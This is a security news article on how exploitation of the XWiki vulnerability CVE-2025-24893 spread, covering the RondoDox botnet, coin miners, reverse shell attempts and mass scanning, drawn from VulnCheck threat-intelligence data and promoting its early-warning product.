Botnets, Miners, and Reverse Shells: XWiki CVE-2025-24893 Becomes a Playground for Attackers

When VulnCheck first reported active exploitation of CVE-2025-24893 in late October, the attacks appeared to stem from a small number of opportunistic actors abusing exposed XWiki servers. Two weeks later, that has changed dramatically.According to new Canary Intelligence data from VulnCheck, exploitation has exploded across the internet, attracting everything from crypto-miners and botnets to custom-built scanning tools and manual intrusion attempts.

From Niche Exploit to Global Frenzy

The timeline is swift and telling. On October 28, VulnCheck researchers published their first warning. By October 30, the vulnerability was added to CISA’s Known Exploited Vulnerabilities (KEV) catalog. Within days, traffic targeting the flaw spiked sharply as attackers integrated the exploit into automated toolkits.

“The actor set is diverse,” VulnCheck noted. “We’re seeing everything from botnets and coin-miners to custom tooling and bespoke scanners.”That diversity makes defense far more difficult—especially for organizations unaware that their servers are exposed.

RondoDox Leads the Charge

One of the first large-scale adopters of the exploit is the RondoDox botnet, which began weaponizing the flaw on November 3. Its signatures were easy to trace: predictable naming conventions (such as rondo.<value>.sh), distinctive HTTP headers, and familiar payload servers.Once executed, RondoDox-linked payloads often deployed secondary scripts that fetched coin miners or additional malware components.

While RondoDox has dominated early activity, it’s far from alone. VulnCheck documented a surge in payloads fetched from various servers around the world—including Ireland, Singapore, and the U.S.—many of which delivered obfuscated code designed to mine cryptocurrency or establish persistent access.

Reverse Shells and “Hands-on-Keyboard” Intrusions

Perhaps more worrying than the miners are the attempts to establish reverse shells, a classic sign of deeper infiltration attempts.On October 31, an AWS-hosted IP attempted to open a shell back to itself using the BusyBox networking binary—behavior consistent with human-operated attacks.By November 11, other hosts were using compromised QNAP and DrayTek systems to pivot and launch shell commands toward remote servers, suggesting that some infected machines were being repurposed as springboards for further intrusion.

Scanners, Probes, and the Noise Before the Storm

Meanwhile, the broader internet has erupted with automated scanning. VulnCheck observed large volumes of traffic from Nuclei-based probes and lesser-known application security testing tools hitting /xwiki/bin/get/Main/SolrSearch endpoints.While some of these probes are exploratory, others are using proof-of-concept payloads that leak sensitive information like /etc/passwd. One captured payload even used OAST (Out-of-Band Application Security Testing) callbacks—indicating more sophisticated reconnaissance.

The Defense Gap

The pattern is familiar: exploitation moves faster than visibility.Once a vulnerability reaches public databases like CISA KEV, attackers are already operational. “Defenders need time, and early detection is the only way to get it,” VulnCheck emphasized.That’s where the company’s Canary Intelligence system comes in—providing what it describes as “early visibility before exploitation becomes widespread.”

The Bigger Picture

CVE-2025-24893 illustrates the widening gap between discovery, disclosure, and exploitation. Within just two weeks, a single vulnerability evolved from a targeted exploit to a free-for-all for profit-driven and opportunistic actors alike.It’s a stark reminder that patching alone isn’t enough—organizations need threat intelligence capable of identifying exploitation attempts before they become widespread.

For defenders, that may mean adopting early-warning systems like VulnCheck’s Canaries, which catch weaponization trends days before they hit mainstream visibility. For attackers, it’s just another day exploiting lag time in the global patching cycle.